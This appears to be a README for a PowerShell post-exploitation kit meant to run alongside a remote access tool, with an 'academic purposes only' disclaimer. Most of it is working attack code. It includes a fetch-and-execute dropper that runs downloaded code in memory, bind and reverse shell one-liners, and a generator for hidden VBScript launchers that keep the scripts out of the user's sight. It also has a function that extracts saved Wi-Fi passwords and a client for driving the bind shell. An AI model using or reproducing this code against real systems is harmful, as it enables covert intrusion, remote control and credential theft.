
A set of basic Post Exploitation scripts written in PowerShell


PS>

This repository contains a collection of simple PowerShell scripts designed for post-exploitation tasks.


DISCLAIMER: THIS PROJECT IS FOR ACADEMIC PURPOSES ONLY. THE DEVELOPERS TAKE NO RESPONSIBILITY FOR ILLEGAL USAGE AND/OR POTENTIAL HARMS.

The scripts provided are meant to be used together with a Remote Access Tool such as hyp3r.

You can use the following one-liner to fetch and execute a script on the target machine from a reverse shell such as the one provided by hyp3r. Replace URL with the raw URL of the .ps1. The first statement copies the logged-on user's network credentials into the default proxy so the download also works behind an authenticating proxy; iex then runs the downloaded text in memory without writing it to disk.

```powershell
# PowerShell dropper
(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('URL')|iex
```

Silent mode

By launching PowerShell through a small VBScript (.vbs) wrapper, all the scripts can be executed without displaying a window, effectively hiding them from the user.

Every script in this repository comes with a Silent Mode launcher (.vbs) written in VBScript. To run a PowerShell script in silent mode, download both the .ps1 and the .vbs file, then execute the .vbs. This setup currently works well: the script does not appear in Task Manager or in tasklist output. You can still terminate the task if needed, and for both shells the connection remains visible in netstat. I plan to streamline this process in the future.
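The following is an added example of how such a silent launcher is produced; it is not one of the kit's .vbs files. It writes a VBScript that starts powershell.exe through WScript.Shell.Run with window style 0 (hidden) and returns immediately, so wscript.exe exits while the PowerShell process keeps running the script. The script and output paths are assumptions.

```powershell
# Added example, not a file from the PS-PostExploitationKit repository: writes the
# kind of VBScript launcher the kit's Silent Mode uses. WScript.Shell.Run with
# window style 0 starts PowerShell with no visible window. Paths are assumptions.
function New-SilentLauncher {
    param(
        [Parameter(Mandatory)] [string] $ScriptPath,   # the .ps1 to run hidden
        [string] $OutFile = [IO.Path]::ChangeExtension($ScriptPath, '.vbs')
    )
    # -WindowStyle Hidden is belt and braces; the VBScript already hides the window
    $cmd = "powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File ""$ScriptPath"""
    # Inside a VBScript string literal every double quote must be doubled
    $vbsCmd = $cmd -replace '"', '""'
    $vbs = @"
Set sh = CreateObject("WScript.Shell")
' 0 = hidden window, False = do not wait for PowerShell to exit
sh.Run "$vbsCmd", 0, False
"@
    Set-Content -Path $OutFile -Value $vbs -Encoding ASCII
    return $OutFile
}

# Usage with assumed paths: writes C:\temp\revscr.vbs next to the script
New-SilentLauncher -ScriptPath 'C:\temp\revscr.ps1'
```

The launcher only suppresses the window. The powershell.exe it starts and any socket that process opens are still there, which is why the connection shows up in netstat for both shells.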

  • wifiscr (extracts the saved Wi-Fi passwords on the target machine)

  • bindscr (Used for setting up a simple bind shell on the target machine)

One-liner version of the bind shell. It listens on TCP 443 on all interfaces, accepts a single client, executes each chunk it receives with iex and returns the output followed by a PS <cwd>> prompt; the loop ends and the listener stops when that client disconnects:

```powershell
$listener = [System.Net.Sockets.TcpListener]443;$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()
```

  • revscr (Used for setting up an interactive reverse shell on the target machine)

PowerShell reverse shell one-liner by Nikhil SamratAshok Mittal (@samratashok). Replace 10.0.0.100 and 4443 with your listener's address and port; the loop runs until the listener closes the connection:

```powershell
$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
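As an added example for the wifiscr entry above (not the kit's wifiscr.ps1), this is the usual way saved Wi-Fi keys are pulled on Windows: enumerate profiles with netsh wlan, then ask netsh for each profile with key=clear and parse the Key Content line. It assumes an English Windows locale, since the netsh labels it matches on are localized, and that the caller is allowed to read the profiles' key material.

```powershell
# Added example, not the kit's wifiscr.ps1: list the saved Wi-Fi profiles with netsh
# and read each stored key, returning objects rather than raw netsh text.
# Assumes an English Windows locale (the 'All User Profile' and 'Key Content' labels
# are localized) and that the caller can read the profiles' key material.
function Get-SavedWifiKey {
    $names = netsh wlan show profiles |
        Select-String -Pattern 'All User Profile\s*:\s*(.+)$' |
        ForEach-Object { $_.Matches[0].Groups[1].Value.Trim() }

    foreach ($name in $names) {
        # key=clear asks netsh to print the stored passphrase instead of masking it
        $detail = netsh wlan show profile name="$name" key=clear
        $key = $detail |
            Select-String -Pattern 'Key Content\s*:\s*(.+)$' |
            ForEach-Object { $_.Matches[0].Groups[1].Value.Trim() } |
            Select-Object -First 1
        # Open networks and profiles whose key this user cannot read have no Key Content line
        if (-not $key) { $key = '<open network or key not readable>' }
        [pscustomobject]@{ SSID = $name; Key = $key }
    }
}

Get-SavedWifiKey | Format-Table -AutoSize
```

Returning objects instead of text makes it easy to filter or export the result (for example `Get-SavedWifiKey | Export-Csv keys.csv`) from the shell you are working in.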
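For the bindscr one-liner above, here is an added example of the operator side of the exchange (not part of the kit): a PowerShell client that connects to the bind shell, sends commands one at a time and reads each reply until the `PS <cwd>> ` prompt the shell appends. Two properties of the one-liner drive the design: each chunk the shell reads is executed as a unit, so a command must be sent in a single write, and the shell's loop ends when the client disconnects, so all commands for a session go over one connection. The target address is an assumption.

```powershell
# Added example, not part of the PS-PostExploitationKit repository: operator-side
# client for the bind shell one-liner. Target address is an assumption.
function Invoke-BindShell {
    param(
        [Parameter(Mandatory)] [string]   $TargetHost,
        [int]                             $Port = 443,
        [Parameter(Mandatory)] [string[]] $Commands
    )
    $client = New-Object System.Net.Sockets.TcpClient($TargetHost, $Port)
    $stream = $client.GetStream()
    $stream.ReadTimeout = 10000          # ms; Read() throws IOException if the prompt never arrives
    $enc     = [System.Text.Encoding]::ASCII
    $buffer  = New-Object byte[] 65536
    $results = @()
    try {
        foreach ($cmd in $Commands) {
            # The shell runs whatever one Read() returns, so send the whole command in one write
            $out = $enc.GetBytes($cmd + "`n")
            $stream.Write($out, 0, $out.Length)
            $reply = New-Object System.Text.StringBuilder
            # The reply is complete once the shell has appended its 'PS <cwd>> ' prompt
            do {
                $n = $stream.Read($buffer, 0, $buffer.Length)
                if ($n -le 0) { break }
                [void]$reply.Append($enc.GetString($buffer, 0, $n))
            } until ($reply.ToString() -match 'PS .+> $')
            $results += $reply.ToString()
        }
    } catch [System.IO.IOException] {
        Write-Warning "Timed out waiting for the shell prompt"
    } finally {
        # Closing the socket makes the target's Read() return 0, which ends its loop and stops the listener
        $client.Close()
    }
    return $results
}

Invoke-BindShell -TargetHost '10.0.0.100' -Commands 'whoami', 'hostname'
```

Because the listener is stopped once the connection closes, a second session needs the bind shell to be started again on the target; plan the command list accordingly.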

Credits to ivan-sincek

Most of the scripts in this repository have been modified from their original versions, which are listed below.

- wifiscr.ps1 - (source)
- bindscr.ps1 - (source)
- revscr.ps1 - (source)

Roadmap

  • Testing and Validation: Perform comprehensive testing to ensure the reliability and effectiveness of the scripts.
  • Simplifying Execution: Streamline the process for running scripts together to improve user experience.
  • Enhancing Documentation: Update and clarify documentation for better guidance on script usage.
  • Adding Features: Consider new features and enhancements based on user feedback.

Feedback is open at:

[email protected]
